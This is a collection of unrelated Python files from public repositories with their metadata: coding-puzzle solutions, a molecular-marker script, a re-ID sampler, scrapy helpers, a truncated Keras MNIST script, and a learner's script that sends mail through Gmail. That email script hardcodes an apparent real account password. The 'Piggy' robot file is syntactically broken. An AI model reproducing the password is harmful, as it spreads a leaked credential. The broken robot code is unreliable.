| 2021-01-02T23:09:00.888981
| 2020-05-08T07:41:52
| 2020-05-08T07:41:52
| 98,892,032
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 290
|
py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2015, Akshay Mehta and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
# test_records = frappe.get_test_records('Hypothecation Company')
class TestHypothecationCompany(unittest.TestCase):
pass
|
[
"mehta.akshay@gmail.com"
] |
mehta.akshay@gmail.com
|
5d5f9c33e96e4005998e5b45f372eab18a6bca4d
|
711756b796d68035dc6a39060515200d1d37a274
|
/output_cog/optimized_27953.py
|
09f31b1b8ab72abff172933a01275553c5eb9d7b
|
[] |
no_license
|
batxes/exocyst_scripts
|
8b109c279c93dd68c1d55ed64ad3cca93e3c95ca
|
a6c487d5053b9b67db22c59865e4ef2417e53030
|
refs/heads/master
| 2020-06-16T20:16:24.840725
| 2016-11-30T16:23:16
| 2016-11-30T16:23:16
| 75,075,164
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,843
|
py
|
import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
if "Cog2_GFPN" not in marker_sets:
s=new_marker_set('Cog2_GFPN')
marker_sets["Cog2_GFPN"]=s
s= marker_sets["Cog2_GFPN"]
mark=s.place_marker((613.939, 549.207, 490.2), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_0" not in marker_sets:
s=new_marker_set('Cog2_0')
marker_sets["Cog2_0"]=s
s= marker_sets["Cog2_0"]
mark=s.place_marker((562.859, 537.597, 531.075), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_1" not in marker_sets:
s=new_marker_set('Cog2_1')
marker_sets["Cog2_1"]=s
s= marker_sets["Cog2_1"]
mark=s.place_marker((489.323, 530.601, 570.859), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_GFPC" not in marker_sets:
s=new_marker_set('Cog2_GFPC')
marker_sets["Cog2_GFPC"]=s
s= marker_sets["Cog2_GFPC"]
mark=s.place_marker((488.926, 561.447, 434.039), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_Anch" not in marker_sets:
s=new_marker_set('Cog2_Anch')
marker_sets["Cog2_Anch"]=s
s= marker_sets["Cog2_Anch"]
mark=s.place_marker((347.183, 509.951, 702.034), (0.89, 0.1, 0.1), 18.4716)
if "Cog3_GFPN" not in marker_sets:
s=new_marker_set('Cog3_GFPN')
marker_sets["Cog3_GFPN"]=s
s= marker_sets["Cog3_GFPN"]
mark=s.place_marker((577.763, 552.573, 519.036), (1, 1, 0), 18.4716)
if "Cog3_0" not in marker_sets:
s=new_marker_set('Cog3_0')
marker_sets["Cog3_0"]=s
s= marker_sets["Cog3_0"]
mark=s.place_marker((579.072, 553.888, 518.272), (1, 1, 0.2), 17.1475)
if "Cog3_1" not in marker_sets:
s=new_marker_set('Cog3_1')
marker_sets["Cog3_1"]=s
s= marker_sets["Cog3_1"]
mark=s.place_marker((598.179, 570.237, 506.068), (1, 1, 0.2), 17.1475)
if "Cog3_2" not in marker_sets:
s=new_marker_set('Cog3_2')
marker_sets["Cog3_2"]=s
s= marker_sets["Cog3_2"]
mark=s.place_marker((608.98, 595.484, 500.552), (1, 1, 0.2), 17.1475)
if "Cog3_3" not in marker_sets:
s=new_marker_set('Cog3_3')
marker_sets["Cog3_3"]=s
s= marker_sets["Cog3_3"]
mark=s.place_marker((593.787, 609.001, 481.138), (1, 1, 0.2), 17.1475)
if "Cog3_4" not in marker_sets:
s=new_marker_set('Cog3_4')
marker_sets["Cog3_4"]=s
s= marker_sets["Cog3_4"]
mark=s.place_marker((591.105, 630.195, 499.355), (1, 1, 0.2), 17.1475)
if "Cog3_5" not in marker_sets:
s=new_marker_set('Cog3_5')
marker_sets["Cog3_5"]=s
s= marker_sets["Cog3_5"]
mark=s.place_marker((587.507, 644.998, 523.082), (1, 1, 0.2), 17.1475)
if "Cog3_GFPC" not in marker_sets:
s=new_marker_set('Cog3_GFPC')
marker_sets["Cog3_GFPC"]=s
s= marker_sets["Cog3_GFPC"]
mark=s.place_marker((602.233, 539.559, 512.34), (1, 1, 0.4), 18.4716)
if "Cog3_Anch" not in marker_sets:
s=new_marker_set('Cog3_Anch')
marker_sets["Cog3_Anch"]=s
s= marker_sets["Cog3_Anch"]
mark=s.place_marker((576.902, 749.27, 541.163), (1, 1, 0.4), 18.4716)
if "Cog4_GFPN" not in marker_sets:
s=new_marker_set('Cog4_GFPN')
marker_sets["Cog4_GFPN"]=s
s= marker_sets["Cog4_GFPN"]
mark=s.place_marker((447.415, 662.788, 670.034), (0, 0, 0.8), 18.4716)
if "Cog4_0" not in marker_sets:
s=new_marker_set('Cog4_0')
marker_sets["Cog4_0"]=s
s= marker_sets["Cog4_0"]
mark=s.place_marker((447.415, 662.788, 670.034), (0, 0, 0.8), 17.1475)
if "Cog4_1" not in marker_sets:
s=new_marker_set('Cog4_1')
marker_sets["Cog4_1"]=s
s= marker_sets["Cog4_1"]
mark=s.place_marker((454.94, 640.651, 653.058), (0, 0, 0.8), 17.1475)
if "Cog4_2" not in marker_sets:
s=new_marker_set('Cog4_2')
marker_sets["Cog4_2"]=s
s= marker_sets["Cog4_2"]
mark=s.place_marker((462.598, 619.14, 635.443), (0, 0, 0.8), 17.1475)
if "Cog4_3" not in marker_sets:
s=new_marker_set('Cog4_3')
marker_sets["Cog4_3"]=s
s= marker_sets["Cog4_3"]
mark=s.place_marker((474.235, 600.677, 616.645), (0, 0, 0.8), 17.1475)
if "Cog4_4" not in marker_sets:
s=new_marker_set('Cog4_4')
marker_sets["Cog4_4"]=s
s= marker_sets["Cog4_4"]
mark=s.place_marker((493.111, 586.147, 600.202), (0, 0, 0.8), 17.1475)
if "Cog4_5" not in marker_sets:
s=new_marker_set('Cog4_5')
marker_sets["Cog4_5"]=s
s= marker_sets["Cog4_5"]
mark=s.place_marker((516.336, 574.803, 586.89), (0, 0, 0.8), 17.1475)
if "Cog4_6" not in marker_sets:
s=new_marker_set('Cog4_6')
marker_sets["Cog4_6"]=s
s= marker_sets["Cog4_6"]
mark=s.place_marker((541.321, 567.948, 573.621), (0, 0, 0.8), 17.1475)
if "Cog4_GFPC" not in marker_sets:
s=new_marker_set('Cog4_GFPC')
marker_sets["Cog4_GFPC"]=s
s= marker_sets["Cog4_GFPC"]
mark=s.place_marker((440.647, 803.794, 602.929), (0, 0, 0.8), 18.4716)
if "Cog4_Anch" not in marker_sets:
s=new_marker_set('Cog4_Anch')
marker_sets["Cog4_Anch"]=s
s= marker_sets["Cog4_Anch"]
mark=s.place_marker((655.636, 337.061, 539.021), (0, 0, 0.8), 18.4716)
if "Cog5_GFPN" not in marker_sets:
s=new_marker_set('Cog5_GFPN')
marker_sets["Cog5_GFPN"]=s
s= marker_sets["Cog5_GFPN"]
mark=s.place_marker((526.957, 540.456, 597.521), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_0" not in marker_sets:
s=new_marker_set('Cog5_0')
marker_sets["Cog5_0"]=s
s= marker_sets["Cog5_0"]
mark=s.place_marker((526.957, 540.456, 597.521), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_1" not in marker_sets:
s=new_marker_set('Cog5_1')
marker_sets["Cog5_1"]=s
s= marker_sets["Cog5_1"]
mark=s.place_marker((521.199, 540.616, 569.615), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_2" not in marker_sets:
s=new_marker_set('Cog5_2')
marker_sets["Cog5_2"]=s
s= marker_sets["Cog5_2"]
mark=s.place_marker((503.194, 549.561, 547.989), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_3" not in marker_sets:
s=new_marker_set('Cog5_3')
marker_sets["Cog5_3"]=s
s= marker_sets["Cog5_3"]
mark=s.place_marker((481.745, 532.73, 537.655), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_GFPC" not in marker_sets:
s=new_marker_set('Cog5_GFPC')
marker_sets["Cog5_GFPC"]=s
s= marker_sets["Cog5_GFPC"]
mark=s.place_marker((572.279, 533.153, 452.556), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_Anch" not in marker_sets:
s=new_marker_set('Cog5_Anch')
marker_sets["Cog5_Anch"]=s
s= marker_sets["Cog5_Anch"]
mark=s.place_marker((386.301, 528.781, 619.136), (0.3, 0.3, 0.3), 18.4716)
if "Cog6_GFPN" not in marker_sets:
s=new_marker_set('Cog6_GFPN')
marker_sets["Cog6_GFPN"]=s
s= marker_sets["Cog6_GFPN"]
mark=s.place_marker((554.534, 537.457, 502.882), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_0" not in marker_sets:
s=new_marker_set('Cog6_0')
marker_sets["Cog6_0"]=s
s= marker_sets["Cog6_0"]
mark=s.place_marker((554.535, 537.452, 502.757), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_1" not in marker_sets:
s=new_marker_set('Cog6_1')
marker_sets["Cog6_1"]=s
s= marker_sets["Cog6_1"]
mark=s.place_marker((538.268, 519.685, 514.754), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_2" not in marker_sets:
s=new_marker_set('Cog6_2')
marker_sets["Cog6_2"]=s
s= marker_sets["Cog6_2"]
mark=s.place_marker((532, 546.991, 524.566), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_3" not in marker_sets:
s=new_marker_set('Cog6_3')
marker_sets["Cog6_3"]=s
s= marker_sets["Cog6_3"]
mark=s.place_marker((548.202, 567.968, 536.238), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_4" not in marker_sets:
s=new_marker_set('Cog6_4')
marker_sets["Cog6_4"]=s
s= marker_sets["Cog6_4"]
mark=s.place_marker((568.133, 588.079, 541.251), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_5" not in marker_sets:
s=new_marker_set('Cog6_5')
marker_sets["Cog6_5"]=s
s= marker_sets["Cog6_5"]
mark=s.place_marker((586.208, 609.874, 544.558), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_6" not in marker_sets:
s=new_marker_set('Cog6_6')
marker_sets["Cog6_6"]=s
s= marker_sets["Cog6_6"]
mark=s.place_marker((604.026, 631.697, 548.543), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_GFPC" not in marker_sets:
s=new_marker_set('Cog6_GFPC')
marker_sets["Cog6_GFPC"]=s
s= marker_sets["Cog6_GFPC"]
mark=s.place_marker((604.448, 556.335, 588.454), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_Anch" not in marker_sets:
s=new_marker_set('Cog6_Anch')
marker_sets["Cog6_Anch"]=s
s= marker_sets["Cog6_Anch"]
mark=s.place_marker((602.71, 708.462, 505.837), (0.21, 0.49, 0.72), 18.4716)
if "Cog7_GFPN" not in marker_sets:
s=new_marker_set('Cog7_GFPN')
marker_sets["Cog7_GFPN"]=s
s= marker_sets["Cog7_GFPN"]
mark=s.place_marker((583.959, 515.305, 583.074), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_0" not in marker_sets:
s=new_marker_set('Cog7_0')
marker_sets["Cog7_0"]=s
s= marker_sets["Cog7_0"]
mark=s.place_marker((561.891, 516.483, 568.028), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_1" not in marker_sets:
s=new_marker_set('Cog7_1')
marker_sets["Cog7_1"]=s
s= marker_sets["Cog7_1"]
mark=s.place_marker((514.205, 521.231, 534.961), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_2" not in marker_sets:
s=new_marker_set('Cog7_2')
marker_sets["Cog7_2"]=s
s= marker_sets["Cog7_2"]
mark=s.place_marker((472.803, 529.621, 496.804), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_GFPC" not in marker_sets:
s=new_marker_set('Cog7_GFPC')
marker_sets["Cog7_GFPC"]=s
s= marker_sets["Cog7_GFPC"]
mark=s.place_marker((522.749, 493.257, 443.031), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_Anch" not in marker_sets:
s=new_marker_set('Cog7_Anch')
marker_sets["Cog7_Anch"]=s
s= marker_sets["Cog7_Anch"]
mark=s.place_marker((377.174, 569.157, 486.864), (0.7, 0.7, 0.7), 18.4716)
if "Cog8_0" not in marker_sets:
s=new_marker_set('Cog8_0')
marker_sets["Cog8_0"]=s
s= marker_sets["Cog8_0"]
mark=s.place_marker((591.503, 484.834, 468.883), (1, 0.5, 0), 17.1475)
if "Cog8_1" not in marker_sets:
s=new_marker_set('Cog8_1')
marker_sets["Cog8_1"]=s
s= marker_sets["Cog8_1"]
mark=s.place_marker((571.077, 484.569, 488.528), (1, 0.5, 0), 17.1475)
if "Cog8_2" not in marker_sets:
s=new_marker_set('Cog8_2')
marker_sets["Cog8_2"]=s
s= marker_sets["Cog8_2"]
mark=s.place_marker((550.141, 484.683, 508.388), (1, 0.5, 0), 17.1475)
if "Cog8_3" not in marker_sets:
s=new_marker_set('Cog8_3')
marker_sets["Cog8_3"]=s
s= marker_sets["Cog8_3"]
mark=s.place_marker((528.144, 487.307, 527.227), (1, 0.5, 0), 17.1475)
if "Cog8_4" not in marker_sets:
s=new_marker_set('Cog8_4')
marker_sets["Cog8_4"]=s
s= marker_sets["Cog8_4"]
mark=s.place_marker((508.706, 482.584, 549.07), (1, 0.5, 0), 17.1475)
if "Cog8_5" not in marker_sets:
s=new_marker_set('Cog8_5')
marker_sets["Cog8_5"]=s
s= marker_sets["Cog8_5"]
mark=s.place_marker((487.983, 481.048, 570.41), (1, 0.5, 0), 17.1475)
if "Cog8_GFPC" not in marker_sets:
s=new_marker_set('Cog8_GFPC')
marker_sets["Cog8_GFPC"]=s
s= marker_sets["Cog8_GFPC"]
mark=s.place_marker((553.92, 514.152, 542.599), (1, 0.6, 0.1), 18.4716)
if "Cog8_Anch" not in marker_sets:
s=new_marker_set('Cog8_Anch')
marker_sets["Cog8_Anch"]=s
s= marker_sets["Cog8_Anch"]
mark=s.place_marker((418.189, 449.589, 604.796), (1, 0.6, 0.1), 18.4716)
for k in surf_sets.keys():
chimera.openModels.add([surf_sets[k]])
|
[
"batxes@gmail.com"
] |
batxes@gmail.com
|
cf7ef5b0adbbc5686cba414b5d88f338966602b7
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_200/3074.py
|
c8f838154185a6edab1140e278a15ba6ec737807
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 457
|
py
|
def main():
T = int(input().strip())
for t in range(T):
N = list(input().strip())
for i in range(len(N)-1, 0, -1):
if int(N[i]) < int(N[i-1]):
N[i-1] = str(int(N[i-1])-1)
j = i
while j < len(N) and N[j] is not '9':
N[j] = '9'
j += 1
print('Case #{}: {}'.format(t+1, int(''.join(N))))
if __name__ == '__main__':
main()
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
895c17f67d35ca30f9d2b319b3786a86e053582d
|
8e853ea941169955c6a0c5fd19f18445cef30649
|
/setup.py
|
aa065ad0a8c2746dff4db92241fb3db7fb46f7ac
|
[
"BSD-3-Clause"
] |
permissive
|
djangosporti/shellpy
|
73b7d9d85800f6090a37a1afab048538c93b5de6
|
3d6c1fb7f6fb9820470f7871c08fd1a9ca78f552
|
refs/heads/master
| 2021-01-15T21:08:25.652465
| 2016-02-28T09:48:25
| 2016-02-28T09:48:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 808
|
py
|
#!/usr/bin/env python
try:
from setuptools import setup
args_for_setup = {'entry_points': {
'console_scripts': {
'shellpy = shellpython.shellpy:main'
}
}}
except ImportError:
from distutils.core import setup
args_for_setup = {'scripts': ['shellpy']}
setup(name='shellpy',
version='0.4.0',
description='A convenient tool for shell scripting in python',
author='Alexander Ponomarev',
author_email='alexander996@yandex.ru',
url='https://github.com/lamerman/shellpy/',
download_url='https://github.com/lamerman/shellpy/tarball/0.4.0',
keywords=['shell', 'bash', 'sh'],
packages=['shellpython'],
package_data={'shellpython': ['*.tpl']},
install_requires=['colorama'],
**args_for_setup
)
|
[
"alexander996@yandex.ru"
] |
alexander996@yandex.ru
|
ca9231cd7675480ce6536c5e7e8fd385d2d6151e
|
4bb21e84e1de39a7b15ad000f47f10bd34a7f165
|
/Scripting_With_Python/email_Playground/Sending_emails_with_python.py
|
cb364bd120bfe7c997a8ffc76da9a2a7fe68197c
|
[] |
no_license
|
manishawsdevops/pythonmaster
|
a32d91e24b04250cd102b9acada367c385d12976
|
e2459536f2ea091be8aba7c9307373802a04a332
|
refs/heads/main
| 2023-06-12T23:59:26.991154
| 2021-07-09T11:19:11
| 2021-07-09T11:19:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 769
|
py
|
# Sending emails with Python.
# Python has the inbuilt email modules.
import smtplib
from email.message import EmailMessage
# For email we need to address from address, Subject and content
# First we need to create email object
email = EmailMessage()
email['from'] = 'Manish AWS Freelancer'
email['to'] = 'manishawsfreelancer@gmail.com'
email['subject'] = 'This email is testing as a python learning course'
# In the content we are going to write the actual message.
email.set_content(
'Heyyyyy You have received this as a part of python learning')
with smtplib.SMTP(host='smtp.gmail.com', port=587) as smtp:
smtp.ehlo()
smtp.starttls()
smtp.login('manishawsdevops@gmail.com', 'Mummydaddy@1994')
smtp.send_message(email)
print('All Good')
|
[
"manishawsfreelancer@gmail.com"
] |
manishawsfreelancer@gmail.com
|
2eba1be43550d89d779b8adfdf934bc8cc96883f
|
3a4278ddfabbcf42811363c0db3def18e406cd94
|
/Main.py
|
4ee34ce95f42e1f2f0f088ea6bd692c06ef23a36
|
[
"MIT"
] |
permissive
|
rodgersa1/HelloRobot1
|
0757f08e4622c7de592aea775553df3ee6b01ff1
|
b67833688cdb2f46c75da790d6087c34b8638139
|
refs/heads/master
| 2021-06-30T02:06:21.474854
| 2017-09-20T18:23:38
| 2017-09-20T18:23:38
| 103,976,284
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 910
|
py
|
from gopigo import*
import time
class Piggy(object):
def _init_(self ):
print ("I AM ALIVE")
def pulse(self):
"""""check for obstacles, drive fixed amount forward"""""
look = us dist(15) # store the distance reading
if look > 80:
fwd()
time.sleep(1)
stop()
def cruise (self):
"""""drive fwd, stop if sensor detects obstacle
fwd()
while(True):
if us dist(15) < 30:
stop()
time.sleep(.2)
def servo_sweep(self):
"""loops in a 120 degree arc and moves servo"""""
for ang in range(20, 160, 2):
servo(ang)
time.sleep(.2)
def cha_cha(self):...
def cha_cha(self):
for x in range(5):
right_rot()
time.sleep(.5)
left_rot()
time.sleep(.5)
stop()
p = Piggy()
|
[
"ivorycoastdre42@gmail.com"
] |
ivorycoastdre42@gmail.com
|
92d8c787ecda8f9124cfff1d9ef89b1c60b01c95
|
6bcd69393c57dd16e0cea56dd554ccd464aa42d5
|
/venv/bin/weasyprint
|
e2fb502abea3bb9745dfd00576d2d8044dec8b70
|
[] |
no_license
|
ecustovic/PdfReports
|
6f4f48839bddd03fa79565cf7b65c0207eea9d48
|
7db82351ddc280878082142fab50a6157f97729f
|
refs/heads/master
| 2023-02-03T09:12:23.059140
| 2020-03-06T13:29:08
| 2020-03-06T13:29:08
| 244,865,428
| 0
| 0
| null | 2023-01-19T17:44:26
| 2020-03-04T09:59:03
|
Python
|
UTF-8
|
Python
| false
| false
| 264
|
#!/home/emina/rails-studio/test_pdf_reports/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from weasyprint.__main__ import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"emina.custovic@edu.fit.ba"
] |
emina.custovic@edu.fit.ba
|
|
c8b22cb55233ad80405b9391f90d05955a09335b
|
7be1e309cd001421b334b027443dec3b4dda9430
|
/14.py
|
d1aa9fc1c213d3627a8c84816a1002fb63a8e578
|
[] |
no_license
|
Eomund/AdventOfCode
|
e144e23a1e9d0e53dd5a58dd768291a5df72a391
|
d6a133584b98a00d0eb95c98a0c0d681bc1a5f87
|
refs/heads/master
| 2020-04-15T23:57:51.751216
| 2019-01-10T19:33:32
| 2019-01-10T19:33:32
| 165,118,946
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 390
|
py
|
rec = [3, 7]
elf1 = 0
elf2 = 1
end = int(input())
while len(rec) < end + 10:
new = str(rec[elf1] + rec[elf2])
for char in new:
rec.append(int(char))
elf1 = (elf1 + 1 + rec[elf1]) % len(rec)
elf2 = (elf2 + 1 + rec[elf2]) % len(rec)
ans = rec[end:end + 10]
s = ""
for a in ans:
s += str(a)
print(s)
|
[
"noreply@github.com"
] |
Eomund.noreply@github.com
|
538d6fa336411b2d3d8a4343aede902e6aaec94f
|
9db62c85450eb6517c904e5cf6ad4de5158c2af4
|
/src/account/views.py
|
e950f49d2cc6ef3f6d20b248174b1beebf20a470
|
[] |
no_license
|
bhubs-python/djpos
|
c50d5e3b397fb549d6fbb2a4b908bd5c7ccb485f
|
70d3d43e50490e90521efff71e818c40366c415a
|
refs/heads/master
| 2021-04-27T04:18:05.513056
| 2018-02-26T12:22:15
| 2018-02-26T12:22:15
| 122,729,668
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 973
|
py
|
from django.shortcuts import render, redirect, get_object_or_404
from django.views import View
from django.contrib.auth.views import login, logout
from django.db.models import Q
from . import forms
from . import models
# logout
def logout_request(request):
logout(request)
return redirect('account:login')
class Login(View):
template_name = 'account/login.html'
def get(self, request):
loginForm = forms.LoginForm()
variables = {
'loginForm': loginForm,
}
return render(request, self.template_name, variables)
def post(self, request):
loginForm = forms.LoginForm(request.POST or None)
if loginForm.is_valid():
user = loginForm.login()
if user:
login(request, user)
return redirect('home:index')
variables = {
'loginForm': loginForm,
}
return render(request, self.template_name, variables)
|
[
"mubarak117136@gmail.com"
] |
mubarak117136@gmail.com
|
b8058a5bc2e12b2774f9b9e16dcb6947a3041297
|
4f51c13ab4a824b98aef42e65c9e0eb0e0c907e6
|
/batch_sampler.py
|
bc3cc03d9d0550c3fe0d78cabfe60629aa030dc6
|
[
"Apache-2.0"
] |
permissive
|
804463592/triplet-reid-pytorch
|
f71175a1eb94e8d2e6f854fe64b34d36bff34302
|
96ee13ebe1c7cb094d8bcf9f3ddf5e5f85d98f35
|
refs/heads/master
| 2020-04-03T11:14:24.951186
| 2018-09-29T06:09:48
| 2018-09-29T06:09:48
| 155,215,577
| 2
| 0
|
Apache-2.0
| 2018-10-29T13:21:36
| 2018-10-29T13:21:35
| null |
UTF-8
|
Python
| false
| false
| 2,220
|
py
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
import torch
from torch.utils.data import Dataset, DataLoader
from torch.utils.data.sampler import Sampler
import cv2
import numpy as np
import random
class RegularBatchSampler(Sampler):
'''
sampler used in dataloader. method __iter__ should output the indices each time it is called
'''
def __init__(self, dataset, n_class, n_num, *args, **kwargs):
super(RegularBatchSampler, self).__init__(dataset, *args, **kwargs)
self.n_class = n_class
self.n_num = n_num
self.batch_size = n_class * n_num
self.dataset = dataset
self.labels = np.array(dataset.labels)
self.len = len(dataset) // self.batch_size
self.lb_img_dict = dataset.lb_img_dict
for k, v in self.lb_img_dict.items():
random.shuffle(self.lb_img_dict[k])
def __iter__(self):
count = 0
while count <= self.len:
label_batch = np.random.choice(self.labels, self.n_class, replace = False)
idx = []
for lb in label_batch:
if len(self.lb_img_dict[lb]) > self.n_num:
idx_smp = np.random.choice(self.lb_img_dict[lb],
self.n_num, replace = False)
else:
idx_smp = np.random.choice(self.lb_img_dict[lb],
self.n_num, replace = True)
# for i, im_idx in enumerate(idx_smp):
# im_name = self.dataset.imgs[im_idx]
# im = cv2.imread(im_name)
# cv2.imshow('img_{}'.format(i), im)
# cv2.waitKey(0)
idx.extend(list(idx_smp))
yield idx
count += 1
def __len__(self):
return len(dataset) // self.batch_size
if __name__ == "__main__":
from datasets.Market1501 import Market1501
ds = Market1501('datasets/Market-1501-v15.09.15/bounding_box_train', mode = 'train')
sampler = RegularBatchSampler(ds, 5, 4)
dl = DataLoader(ds, batch_sampler = sampler, num_workers = 4)
for i, (ims, lbs) in enumerate(dl):
print(ims.shape)
print(lbs.shape)
# if i == 4: break
|
[
"867153576@qq.com"
] |
867153576@qq.com
|
a999a910907ed10fc21700f83ad2a7277ed87aeb
|
1b26a8948d65b6fa5f4b08cea2bf5ea48e43e977
|
/day1_candyBucket.py
|
bd476569f33261a6d7cc2e4f40903baf52825d16
|
[] |
no_license
|
DeveloperChoi90/programmers_kdigital
|
eee895aa208bf3cb361fc0fb544a906fefda9cfc
|
289a4edabd6fb7db72a9f0b293046ff828ee1ab6
|
refs/heads/main
| 2023-06-02T05:14:23.927403
| 2021-06-13T18:06:34
| 2021-06-13T18:06:34
| 359,888,310
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,039
|
py
|
from itertools import combinations
def solution(m, weights):
answer = 0
for i in range(len(weights)):
combi = combinations(weights, i)
answer += [sum(candies) for candies in combi].count(m)
return answer
def solution2(m, weights):
answer = 0
for i in range(len(weights)):
results = map(sum, combinations(weights, i))
for result in results:
if result == m:
answer += 1
return answer
# 비트 연산자 사용 하여 무게를 사용, 사용하지않음 두가지 경우의 수 즉, 2^n 승 이용 모든 경우의 수를 가지고 계산
def solution3(m, weights):
answer = 0
for stat in range(1, (1 << len(weights))):
now = 0
for i in range(len(weights)):
if stat & 1 << i:
now += weights[i]
if now == m:
answer += 1
return answer
m = 3000
weights = [500, 1500, 2500, 1000, 2000]
# print(solution(m, weights))
print(solution2(m, weights))
# print(solution3(m, weights))
|
[
"DeveloperChoi90@gmail.com"
] |
DeveloperChoi90@gmail.com
|
ee84040faf43259103c17931f9209b1ae40621b6
|
b037e36771bd47cb84a9ce9745ffeac801256b56
|
/hot_info/picrew_info/picrew_info/utils.py
|
95fd1965de6e5a29fe2493be7981d89d4f4b199c
|
[] |
no_license
|
SuperMMORPG/scrapy_project
|
7004714ede620bddf30dd15d8779322959087280
|
ccac1089de94064077444026b3a1f484910d7543
|
refs/heads/main
| 2023-05-15T02:59:24.195936
| 2021-06-09T15:43:03
| 2021-06-09T15:43:03
| 344,821,692
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,297
|
py
|
from redis import Redis
import os
import time
from datetime import datetime
def connect():
host = '192.168.1.100'
port = 6379
conn = Redis(host=host,port=port)
return conn
def add(conn,name,url):
ex = conn.sadd(name,url)
if ex==1:
print('**该地址为新地址,可以进行任务获取',url)
return True
else:
print('##地址已经存在',url)
return False
def create_md(spider):
#print('开始任务...')
fp = None
dir_path = './today_data'
name = spider.name + '_'
filename = name + datetime.today().strftime('%Y%m%d') + '.md'
file_path = os.path.join(dir_path,filename)
fp = open(file_path,'w',encoding='utf-8')
fp.write('---')
fp.write('\n')
fp.write('title: %s'%(spider.name))
fp.write('\n')
ymd_time = time.strftime('%Y-%m-%d ',time.localtime())
fp.write('date: %s'%(ymd_time))
fp.write('\n')
fp.write('tags: scrapy_%s'%(spider.name))
fp.write('\n')
fp.write('categories: news')
fp.write('\n')
fp.write('---')
fp.write('\n')
fp.write('# %s'%(spider.name))
fp.write('\n')
now_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
fp.write('## %s'%(now_time))
fp.write('\n')
fp.write('*****'+'\n')
return fp
|
[
"bad_jin@outlook.com"
] |
bad_jin@outlook.com
|
420bfc1384cc7e64d98a0a50480e91c6a98e4e9c
|
69be6b5974c50eedeba274ee9a8d9a4bfdb48172
|
/code1.py
|
5b225b7e3b4d7a89dd103888f7092e55fe3093ae
|
[] |
no_license
|
Praneeth102/mlops3
|
1b00cef590dbffd372c46db5c0feb128501d8b26
|
4a109ea696cd678ba580b5b0addd5b538ff24442
|
refs/heads/master
| 2022-09-09T16:46:13.283205
| 2020-05-27T17:54:09
| 2020-05-27T17:54:09
| 267,030,077
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,518
|
py
|
#importing data from keras
from keras.datasets import mnist
from keras.utils import np_utils
import keras
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D, BatchNormalization
from keras import backend as K
# Training Parameters
batch_size = 128
epochs =1
# Lets store the number of rows and columns
img_rows =28
img_cols =28
# the data, split between train and test sets
(x_train, y_train), (x_test, y_test) = mnist.load_data('mymnist.data')
# Getting our date in the right 'shape' needed for Keras
# We need to add a 4th dimenion to our date thereby changing our
# Our original image shape of (60000,28,28) to (60000,28,28,1)
x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)
x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)
# store the shape of a single image
input_shape = (img_rows, img_cols, 1)
# change our image type to float32 data type
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
# Normalize our data by changing the range from (0 to 255) to (0 to 1)
x_train /= 255
x_test /= 255
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
# Now we one hot encode outputs
y_train = np_utils.to_categorical(y_train)
y_test = np_utils.to_categorical(y_test)
# Let's count the number columns in our hot encoded matrix
print ("Number of Classes: " + str(y_test.shape[1]))
# create model
num_classes=10
model = Sequential()
model.add(Conv2D(32, kernel_size=(3, 3),
